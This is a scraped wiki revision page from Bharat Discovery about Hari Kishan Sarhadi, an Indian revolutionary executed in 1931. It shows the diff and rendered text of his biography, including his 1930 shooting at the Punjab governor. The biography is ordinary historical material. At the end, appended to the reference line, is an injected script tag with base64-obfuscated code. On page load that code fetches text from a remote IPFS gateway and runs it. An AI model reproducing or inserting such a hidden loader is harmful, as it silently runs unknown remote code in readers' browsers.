Difference between revisions of "हरि किशन सरहदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''हरि किशन सरहदी''' (अंग्रेज़ी: ''Hari Kishan Sarhadi'', जन्म: 1912 <ref>क...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''हरि किशन सरहदी''' ([[अंग्रेज़ी]]: ''Hari Kishan Sarhadi'',  जन्म: [[1912]] <ref>कई स्रोतों पर इनका जन्म सन् [[1909]] में भी बताया गया है।</ref>-  शहीद: [[9 जून]], [[1931]]) [[भारत]] के प्रसिद्ध क्रांतिकारी थे जो भारत की आज़ादी की लड़ाई शहीद हो गये।  
+
{{सूचना बक्सा स्वतन्त्रता सेनानी
 +
|चित्र=Hari-kishan-sarhadi.jpg
 +
|चित्र का नाम=हरि किशन सरहदी
 +
|पूरा नाम=शहीद हरि किशन सरहदी
 +
|अन्य नाम=हरि किशन मल
 +
|जन्म=[[1909]]
 +
|जन्म भूमि=
 +
|मृत्यु=[[9 जून]], [[1931]]
 +
|मृत्यु स्थान=
 +
|मृत्यु कारण=
 +
|अविभावक=पिता- गुरुदास मल
 +
|पति/पत्नी=
 +
|संतान=
 +
|स्मारक=
 +
|क़ब्र=
 +
|नागरिकता=भारतीय
 +
|प्रसिद्धि=स्वतंत्रता सेनानी
 +
|धर्म=
 +
|आंदोलन=[[भारतीय स्वतंत्रता संग्राम]]
 +
|जेल यात्रा=
 +
|कार्य काल=
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|विशेष योगदान=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी= [[23 दिसम्बर]], [[1930]] को दीक्षांत समारोह के अध्यक्ष ज्योफ्रे डी मोरमोरेंसी () को दो गोली मारी थीं। जिसके बदले में इन्हें मृत्यु दंड दिया गया।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''हरि किशन सरहदी''' ([[अंग्रेज़ी]]: ''Hari Kishan Sarhadi'',  जन्म: [[1909]] -  शहीद: [[9 जून]], [[1931]]) [[भारत]] के प्रसिद्ध क्रांतिकारी थे जो भारत की आज़ादी की लड़ाई शहीद हो गये।  
 
==जीवन परिचय==
 
==जीवन परिचय==
उत्तर-पश्चिम के सीमांत प्रान्त के मर्दन जनपद के गल्ला ढेर नामक स्थान पर गुरुदास मल के पुत्र रूप में सन 1912 में बालक हरिकिशन का जन्म हुआ था। गुरु दास मल की माँ यानि कि हरिकिशन की दादी माँ बचपन से ही क्रान्तिकारियों के किस्से कहानियों के रूप में बालक हरिकिशन को सुनाया करती थीं। क्रांति का बीज परिवार ने ही बोया। क्रांति बीज को पोषित करके, हरा-भरा करके माँ भारती के कदमो में समर्पित पिता गुरुदास मल ने किया। [[काकोरी कांड]] का बड़े लगन व चाव से अध्ययन हरिकिशन ने किया। [[रामप्रसाद बिस्मिल]] व [[अशफ़ाक़ उल्ला ख़ाँ]] हरिकिशन के आदर्श बन गये। दौरान-ए-मुकदमा (असेम्बली बम कांड) [[भगत सिंह]] के बयानों ने हरिकिशन के युवा मन को झक झोर दिया। भगत सिंह को हरिकिशन अपना गुरु मानने लगे। यह वह दौर था जब ब्रिटिश हुकूमत द्वारा पूरे देश में क्रान्तिकारियों पर दमन अपने चरम पर था।<ref>{{cite web |url=http://troindia.blogspot.in/2012/06/blog-post_15.html |title=शहीद हरी किशन सरहदी |accessmonthday=23 जून |accessyear=2013 |last= |first= |authorlink= |format= |publisher=The Realty of India |language=हिंदी }}</ref>
+
उत्तर-पश्चिम के सीमांत प्रान्त के मर्दन जनपद के गल्ला ढेर नामक स्थान पर गुरुदास मल के पुत्र रूप में सन 1909 में बालक हरिकिशन का जन्म हुआ था। गुरु दास मल की माँ यानि कि हरिकिशन की दादी माँ बचपन से ही क्रान्तिकारियों के किस्से कहानियों के रूप में बालक हरिकिशन को सुनाया करती थीं। क्रांति का बीज परिवार ने ही बोया। क्रांति बीज को पोषित करके, हरा-भरा करके माँ भारती के कदमो में समर्पित पिता गुरुदास मल ने किया। [[काकोरी कांड]] का बड़े लगन व चाव से अध्ययन हरिकिशन ने किया। [[रामप्रसाद बिस्मिल]] व [[अशफ़ाक़ उल्ला ख़ाँ]] हरिकिशन के आदर्श बन गये। दौरान-ए-मुकदमा (असेम्बली बम कांड) [[भगत सिंह]] के बयानों ने हरिकिशन के युवा मन को झक झोर दिया। भगत सिंह को हरिकिशन अपना गुरु मानने लगे। यह वह दौर था जब ब्रिटिश हुकूमत द्वारा पूरे देश में क्रान्तिकारियों पर दमन अपने चरम पर था।<ref name="TRI">{{cite web |url=http://troindia.blogspot.in/2012/06/blog-post_15.html |title=शहीद हरी किशन सरहदी |accessmonthday=23 जून |accessyear=2013 |last= |first= |authorlink= |format= |publisher=The Realty of India |language=हिंदी }}</ref>
 
==क्रांतिकारी जीवन==
 
==क्रांतिकारी जीवन==
यह वह दौर था जब ब्रिटिश हुकूमत द्वारा पूरे देश में क्रान्तिकारियों पर दमन अपने चरम पर था। इन्हीं परिस्थितियों में क्रांतिपुत्र हरिकिशन ने [[पंजाब]] के गवर्नर ज्योफ्रे डी मोरमोरेंसी का वध करने का निश्चय किया। पंजाब विश्विद्यालय का दीक्षांत समारोह [[23 दिसम्बर]], [[1930]] को संपन्न होना था। समारोह की अध्यक्षता गवर्नर ज्योफ्रे डी मोरमोरेंसी को करनी थी और मुख्य वक्ता [[सर्वपल्ली राधाकृष्णन|डॉ. राधाकृष्णन]] थे। अपनी पूरी तैयारी के साथ हरिकिशन भी सूट-बूट पहन कर दीक्षांत भवन में उपस्थित थे। डिक्शनरी के बीच के हिस्से को काटकर उसमें रिवाल्वर रखकर समारोह की समाप्ति का इंतज़ार करने लगे। यह ध्यान देने की बात है कि हरिकिशन को गोली चलाने की ट्रेनिंग उनके ही पिता गुरुदास मल ने स्वयं ही दी थी। हरिकिशन एक पक्के निशानेबाज बन गये थे। समारोह समाप्त होते ही लोग निकलने लगे।| हरिकिशन एक कुर्सी पर खड़े हो गये और उन्होंने गोली चला दी, एक गोली गवर्नर की बांह और दूसरी पीठ को छिलती हुई निकल गयी। तब तक डॉ. राधाकृष्णन गवर्नर ज्योफ्रे डी मोरमोरेंसी को बचाने के लिए उनके सामने आ गये। अब हरिकिशन ने गोली नहीं चलायी और सभा भवन से निकल कर पोर्च में आ गये। पुलिस दरोगा चानन सिंह पीछे से लपके और वे हरिकिशन का शिकार बन गये, एक और दरोगा बुद्ध सिंह वधावन ज़ख़्मी होकर गिर पड़ा। हरिकिशन अपना रिवाल्वर भरने लगे परन्तु इसी दौरान पुलिस ने उन्हें धर दबोचा। इस तरह उस समय एक ब्रितानिया शोषक-जुल्मी की जन किसने बचायी और वे कितने बड़े देशभक्त थे, यह इस घटना से समझा जा सकता है। अब हरिकिशन पर अमानवीय यातनाओं का दौर शुरु हो गया।
+
यह वह दौर था जब ब्रिटिश हुकूमत द्वारा पूरे देश में क्रान्तिकारियों पर दमन अपने चरम पर था। इन्हीं परिस्थितियों में क्रांतिपुत्र हरिकिशन ने [[पंजाब]] के गवर्नर ज्योफ्रे डी मोरमोरेंसी का वध करने का निश्चय किया। पंजाब विश्विद्यालय का दीक्षांत समारोह [[23 दिसम्बर]], [[1930]] को संपन्न होना था। समारोह की अध्यक्षता गवर्नर ज्योफ्रे डी मोरमोरेंसी को करनी थी और मुख्य वक्ता [[सर्वपल्ली राधाकृष्णन|डॉ. राधाकृष्णन]] थे। अपनी पूरी तैयारी के साथ हरिकिशन भी सूट-बूट पहन कर दीक्षांत भवन में उपस्थित थे। डिक्शनरी के बीच के हिस्से को काटकर उसमें रिवाल्वर रखकर समारोह की समाप्ति का इंतज़ार करने लगे। यह ध्यान देने की बात है कि हरिकिशन को गोली चलाने की ट्रेनिंग उनके ही पिता गुरुदास मल ने स्वयं ही दी थी। हरिकिशन एक पक्के निशानेबाज बन गये थे। समारोह समाप्त होते ही लोग निकलने लगे। हरिकिशन एक कुर्सी पर खड़े हो गये और उन्होंने गोली चला दी, एक गोली गवर्नर की बांह और दूसरी पीठ को छिलती हुई निकल गयी। तब तक डॉ. राधाकृष्णन गवर्नर ज्योफ्रे डी मोरमोरेंसी को बचाने के लिए उनके सामने आ गये। अब हरिकिशन ने गोली नहीं चलायी और सभा भवन से निकल कर पोर्च में आ गये। पुलिस दरोगा चानन सिंह पीछे से लपके और वे हरिकिशन का शिकार बन गये, एक और दरोगा बुद्ध सिंह वधावन ज़ख़्मी होकर गिर पड़ा। हरिकिशन अपना रिवाल्वर भरने लगे परन्तु इसी दौरान पुलिस ने उन्हें धर दबोचा। इस तरह उस समय एक ब्रितानिया शोषक-जुल्मी की जन किसने बचायी और वे कितने बड़े देशभक्त थे, यह इस घटना से समझा जा सकता है। अब हरिकिशन पर अमानवीय यातनाओं का दौर शुरु हो गया।<ref name="TRI"/>
 +
====22 वर्ष की आयु में शहीद====
 +
[[लाहौर]] के सेशन जज ने [[26 जनवरी]], [[1931]] को हरिकिशन को मृत्यु दंड दिया। हाई कोर्ट ने भी फैसले पर मोहर लगायी। जेल में दादी ने आकर कहा- हौसले के साथ फांसी पर चढ़ना। हरिकिशन ने जवाब दिया- फिक्र मत करो दादी, शेरनी का पोता हूँ। पिता ने जेल में तकलीफ पूछने की जगह सवाल दागा- निशाना कैसे चूका ? उत्तर मिला- मैं गवर्नर के आस पास के लोगों को नहीं मरना चाहता था इसीलिए कुर्सी पर खड़े होकर गोली चलाई थी। परन्तु कुर्सी हिल रही थी। उसी जेल में भगत सिंह भी कैद थे। भगत सिंह से मिलने के लिए हरिकिशन अनशन पर बैठ गये। अनशन के नौवें दिन जेल अधिकारियों ने भगत सिंह को हरिकिशन की कोठरी में मिलने के लिए भेजा। अपने गुरु से मिलकर हरिकिशन बहुत प्रसन्न हुये। आपके पिता गुरुदास मल को भी गिरफ्तार कर लिया गया। यातनाएं दी गयीं जिससे उनकी मृत्यु हो गयी। हरिकिशन को ही छोटा भाई भगतराम [[सुभाष चन्द्र बोस]] को रहमत उल्लाह के छद्म नाम से [[अफगानिस्तान]] तक छोड़ने गया था। पूरा परिवार ही देश की आज़ादी में अपना योगदान और बलिदान देने में जुटा हुआ था। [[9 जून]], [[1931]] को प्रातः 6 बजे लाहौर की मियां वाली जेल में इन्कलाब जिंदाबाद के नारे गुंजायमान होने लगे और फिर एक तूफान आने के बाद की खामोश छा गयी। वीर युवा हरिकिशन आज़ादी की राह पर फांसी के तख्ते पर चढ़ा दिया गया।<ref name="TRI"/>
 +
==अंतिम इच्छा==
 +
रणबांकुरे हरिकिशन की अंतिम इच्छा थी कि- "मैं इस पवित्र धरती पर तब तक जन्म लेता रहूँ जब तक इसे स्वतंत्र ना कर दूँ। यदि मेरा मृत शरीर परिवार वालों को दिया जाये तो अंतिम संस्कार उसी स्थान पर किया जाये जहाँ पर [[भगत सिंह|शहीद भगत सिंह]], [[सुखदेव]] और [[राजगुरु]] का संस्कार हुआ था। मेरी अस्थियाँ [[सतलुज नदी|सतलुज]] में उसी स्थान पर प्रवाहित की जाये जहाँ उन लोगों की प्रवाहित की गयी हैं।" लेकिन अफ़सोस ही कर सकते है कि ब्रिटिश हुकूमत ने हरिकिशन के पार्थिव शरीर को उनके परिवार को नहीं सौंपा और जेल में ही जला दिया।<ref name="TRI"/>
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
+
*[http://rashtravaad-hsra.blogspot.in/2011/04/blog-post_5147.html अमर शहीद हरिकिशन मल]
 +
*[http://www.shahidbhagatsingh.org/index.asp?choice=co_patriots_details&Person_ID=18 Shaheed Hari Kishan Sarhadi]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{स्वतन्त्रता सेनानी}}
[[Category:नया पन्ना मार्च-2013]]
+
[[Category:स्वतन्त्रता सेनानी]]
 
+
[[Category:इतिहास कोश]] [[Category:चरित कोश]]
 +
[[Category:औपनिवेशिक काल]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 09:25, 23 June 2013

hari kishan sarahadi
poora nam shahid hari kishan sarahadi
any nam hari kishan mal
janm 1909
mrityu 9 joon, 1931
nagarikata bharatiy
prasiddhi svatantrata senani
aandolan bharatiy svatantrata sangram
any janakari 23 disambar, 1930 ko dikshaant samaroh ke adhyaksh jyophre di moramoreansi () ko do goli mari thian. jisake badale mean inhean mrityu dand diya gaya.

hari kishan sarahadi (aangrezi: Hari Kishan Sarhadi, janm: 1909 - shahid: 9 joon, 1931) bharat ke prasiddh kraantikari the jo bharat ki azadi ki l daee shahid ho gaye.

jivan parichay

uttar-pashchim ke simaant prant ke mardan janapad ke galla dher namak sthan par gurudas mal ke putr roop mean san 1909 mean balak harikishan ka janm hua tha. guru das mal ki maan yani ki harikishan ki dadi maan bachapan se hi krantikariyoan ke kisse kahaniyoan ke roop mean balak harikishan ko sunaya karati thian. kraanti ka bij parivar ne hi boya. kraanti bij ko poshit karake, hara-bhara karake maan bharati ke kadamo mean samarpit pita gurudas mal ne kiya. kakori kaand ka b de lagan v chav se adhyayan harikishan ne kiya. ramaprasad bismil v ashafaq ulla khaan harikishan ke adarsh ban gaye. dauran-e-mukadama (asembali bam kaand) bhagat sianh ke bayanoan ne harikishan ke yuva man ko jhak jhor diya. bhagat sianh ko harikishan apana guru manane lage. yah vah daur tha jab british hukoomat dvara poore desh mean krantikariyoan par daman apane charam par tha.[1]

kraantikari jivan

yah vah daur tha jab british hukoomat dvara poore desh mean krantikariyoan par daman apane charam par tha. inhian paristhitiyoan mean kraantiputr harikishan ne panjab ke gavarnar jyophre di moramoreansi ka vadh karane ka nishchay kiya. panjab vishvidyalay ka dikshaant samaroh 23 disambar, 1930 ko sanpann hona tha. samaroh ki adhyakshata gavarnar jyophre di moramoreansi ko karani thi aur mukhy vakta d aau. radhakrishnan the. apani poori taiyari ke sath harikishan bhi soot-boot pahan kar dikshaant bhavan mean upasthit the. dikshanari ke bich ke hisse ko katakar usamean rivalvar rakhakar samaroh ki samapti ka iantazar karane lage. yah dhyan dene ki bat hai ki harikishan ko goli chalane ki treniang unake hi pita gurudas mal ne svayan hi di thi. harikishan ek pakke nishanebaj ban gaye the. samaroh samapt hote hi log nikalane lage. harikishan ek kursi par kh de ho gaye aur unhoanne goli chala di, ek goli gavarnar ki baanh aur doosari pith ko chhilati huee nikal gayi. tab tak d aau. radhakrishnan gavarnar jyophre di moramoreansi ko bachane ke lie unake samane a gaye. ab harikishan ne goli nahian chalayi aur sabha bhavan se nikal kar porch mean a gaye. pulis daroga chanan sianh pichhe se lapake aur ve harikishan ka shikar ban gaye, ek aur daroga buddh sianh vadhavan zakhmi hokar gir p da. harikishan apana rivalvar bharane lage parantu isi dauran pulis ne unhean dhar dabocha. is tarah us samay ek britaniya shoshak-julmi ki jan kisane bachayi aur ve kitane b de deshabhakt the, yah is ghatana se samajha ja sakata hai. ab harikishan par amanaviy yatanaoan ka daur shuru ho gaya.[1]

22 varsh ki ayu mean shahid

lahaur ke seshan jaj ne 26 janavari, 1931 ko harikishan ko mrityu dand diya. haee kort ne bhi phaisale par mohar lagayi. jel mean dadi ne akar kaha- hausale ke sath phaansi par chadhana. harikishan ne javab diya- phikr mat karo dadi, sherani ka pota hooan. pita ne jel mean takaliph poochhane ki jagah saval daga- nishana kaise chooka ? uttar mila- maian gavarnar ke as pas ke logoan ko nahian marana chahata tha isilie kursi par kh de hokar goli chalaee thi. parantu kursi hil rahi thi. usi jel mean bhagat sianh bhi kaid the. bhagat sianh se milane ke lie harikishan anashan par baith gaye. anashan ke nauvean din jel adhikariyoan ne bhagat sianh ko harikishan ki kothari mean milane ke lie bheja. apane guru se milakar harikishan bahut prasann huye. apake pita gurudas mal ko bhi giraphtar kar liya gaya. yatanaean di gayian jisase unaki mrityu ho gayi. harikishan ko hi chhota bhaee bhagataram subhash chandr bos ko rahamat ullah ke chhadm nam se aphaganistan tak chho dane gaya tha. poora parivar hi desh ki azadi mean apana yogadan aur balidan dene mean juta hua tha. 9 joon, 1931 ko pratah 6 baje lahaur ki miyaan vali jel mean inkalab jiandabad ke nare guanjayaman hone lage aur phir ek toophan ane ke bad ki khamosh chha gayi. vir yuva harikishan azadi ki rah par phaansi ke takhte par chadha diya gaya.[1]

aantim ichchha

ranabaankure harikishan ki aantim ichchha thi ki- "maian is pavitr dharati par tab tak janm leta rahooan jab tak ise svatantr na kar dooan. yadi mera mrit sharir parivar valoan ko diya jaye to aantim sanskar usi sthan par kiya jaye jahaan par shahid bhagat sianh, sukhadev aur rajaguru ka sanskar hua tha. meri asthiyaan sataluj mean usi sthan par pravahit ki jaye jahaan un logoan ki pravahit ki gayi haian." lekin afasos hi kar sakate hai ki british hukoomat ne harikishan ke parthiv sharir ko unake parivar ko nahian sauanpa aur jel mean hi jala diya.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 1.3 shahid hari kishan sarahadi (hiandi) The Realty of India. abhigaman tithi: 23 joon, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh